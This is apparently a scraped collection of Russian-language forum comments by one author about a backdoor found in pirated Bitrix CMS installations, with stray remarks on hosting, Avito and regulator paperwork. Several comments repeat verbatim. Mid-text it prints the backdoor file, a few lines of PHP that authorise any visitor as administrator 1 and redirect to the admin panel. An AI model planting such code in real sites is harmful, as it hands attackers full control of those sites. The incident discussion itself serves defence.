Повторюсь — нет архива версий, чтобы сравнение было правильным. В битриксе с его кодом, я уверен, на каждую минорную версию приходится столько исправлений, от которых никакой анализ не поможет. Что говорить о мажорных. Пройдемся рекурсивно диффом, увидим не одну тысячу изменений из которых 999 — сделаны разработчиками.
А вы сравнивали расход оперативной памяти при размещении сайта на хостинге с условными 2гб лимита, или на виртуалке с теми же 2гб лимита? А 10 сайтов на том же тарифе хостинга и на той же виртуалке, при условии, что сайты посещает больше 1 человека и 10 ботов?
вероятно бот просто по паттернам перебирает всё что может перебрать, а new.php был остановлен задолго до него кем-то. О чем я и предположил, что они не связаны между собой (скорее всего).
Таки нет, так-как
1) во-первых, версии взломанных были разными, и не самыми древними
2) в некоторых версиях ядро битрикса (то, где проверяется лицензия) — закодировано (точно не помню, в каких и до каких)
3) ну и анализ диффом это весьма длительная задача для битрикса, учитывая его иерархию. Безусловно, можно быстро отсеить все что одинаковое и анализировать что отличается, но… зачем столько чести для взломанного битрикса? Будь это лицензионный, то да, можно провести более доскональное расследование. Хотя у битрикса нет репо, где можно найти любую версию, чтобы поиск был наиболее грамотным.
Но Ваше предположение выглядит корректно, возможно найденные файлы лишь часть проблемы.
Заголовок действительно вышел кликбейтным, к битриксу в легальном виде данная проблема маловероятно имеет какое-либо отношение, поэтому чутка подправил
Выше я говорил об этом, что в оф редакции битрикса таких файлов нет, и не было в принципе. Айпи самый обычный digital ocean, не думаю что есть смысл его раскрывать — таких тысячи, да и многие ищут уязвимости через уязвимости. Как например взломанный вордпресс может сканить другие вордпресс сайты на предмет наличия уязвимостей
Проблема в том, что многие массово используют этот самый пиратский битрикс с возможной дырой. Не так много, как те, кто использует его легально — но я столкнулся не с 5 и даже не с 20 случаями взлома через эту дырку.
А так да, основная дырка тут не бэкдор, а желание сэкономить, как сказали выше.
<?
require($_SERVER["DOCUMENT_ROOT"] . "/bitrix/header.php");
global $USER;
$USER->Authorize(1);
LocalRedirect(“/bitrix/admin/”);
в стандартном дистрибутиве его нет, в проблемных он был в трех экземплярах раскинут по разным папкам (но у всех одинаково), что наводит на мысли о том, что используемый дистрибутив был скачан вместе с ними.
при этом взломанные сайты между собой никак не связаны, у них разные владельцы, разные разработчики, короче всё разное, кроме пары общих факторов.
Самая, что ни на есть. Проблемы с битриксом появляются чаще, за 2 года уже третья как минимум. Не говоря уже о том, что многие забывают про такие базовые меры предосторожности, как restore.php в корне сайта. Но такие случаи интересны — бэкдор в битриксе встретишь не часто, и очень хорошо, что всех объединил общий фактор.
А вот грамотность обслуживания сайтов хромает — никто не задается вопросом проблем с обновлением от разработчиков, как на том же условном битриксе, так и на других cms типа wordpress/joomla и тп.
Если не размещаете нелегальщину, то и бояться нечего. Обычная защита от мошенников, 95% хостеров рунета требуют её и на платных услугах, стоит им только в чём-то усомниться. А так, даже на сайте написано, платите 30 рублей в месяц — и никаких документов предоставлять не надо. По ресурсам и быстродействию отличный вариант.
Странно, чего только не продавал на авито и за размещение никогда не платил. То, что оно там есть, я знаю, но там есть и лимит бесплатных объяв — 3 штуки, емнип. Маловато, конечно, возможно с появлением альтернатив сделают побольше.
Эшер рассказал, как правильно и по закону их отшивать на данный момент. И это работает.
Другой момент, который меня раздражает — информацию запрашивают вообще у всех, и даже не волнует, что у тебя может не быть оборудования для предоставления телеком услуг. По мнению бюрократов из РКН, логика простая — есть AS — есть и оборудование. И не волнует.
Лучше бы они так удаляли сайты и айпи из реестра, которых там быть не должно, как требовали заполнение форм, которых без бутылки не понять.
вероятно бот просто по паттернам перебирает всё что может перебрать, а new.php был остановлен задолго до него кем-то. О чем я и предположил, что они не связаны между собой (скорее всего).
Потому что на удивление взломанный битрикс использует меньше людей, чем не взломанный
Таки нет, так-как
1) во-первых, версии взломанных были разными, и не самыми древними
2) в некоторых версиях ядро битрикса (то, где проверяется лицензия) — закодировано (точно не помню, в каких и до каких)
3) ну и анализ диффом это весьма длительная задача для битрикса, учитывая его иерархию. Безусловно, можно быстро отсеить все что одинаковое и анализировать что отличается, но… зачем столько чести для взломанного битрикса? Будь это лицензионный, то да, можно провести более доскональное расследование. Хотя у битрикса нет репо, где можно найти любую версию, чтобы поиск был наиболее грамотным.
Но Ваше предположение выглядит корректно, возможно найденные файлы лишь часть проблемы.
Интересно, а название файла какое было?
Выше я говорил об этом, что в оф редакции битрикса таких файлов нет, и не было в принципе. Айпи самый обычный digital ocean, не думаю что есть смысл его раскрывать — таких тысячи, да и многие ищут уязвимости через уязвимости. Как например взломанный вордпресс может сканить другие вордпресс сайты на предмет наличия уязвимостей
Проблема в том, что многие массово используют этот самый пиратский битрикс с возможной дырой. Не так много, как те, кто использует его легально — но я столкнулся не с 5 и даже не с 20 случаями взлома через эту дырку.
А так да, основная дырка тут не бэкдор, а желание сэкономить, как сказали выше.
в стандартном дистрибутиве его нет, в проблемных он был в трех экземплярах раскинут по разным папкам (но у всех одинаково), что наводит на мысли о том, что используемый дистрибутив был скачан вместе с ними.
при этом взломанные сайты между собой никак не связаны, у них разные владельцы, разные разработчики, короче всё разное, кроме пары общих факторов.
А вот грамотность обслуживания сайтов хромает — никто не задается вопросом проблем с обновлением от разработчиков, как на том же условном битриксе, так и на других cms типа wordpress/joomla и тп.
Другой момент, который меня раздражает — информацию запрашивают вообще у всех, и даже не волнует, что у тебя может не быть оборудования для предоставления телеком услуг. По мнению бюрократов из РКН, логика простая — есть AS — есть и оборудование. И не волнует.
Лучше бы они так удаляли сайты и айпи из реестра, которых там быть не должно, как требовали заполнение форм, которых без бутылки не понять.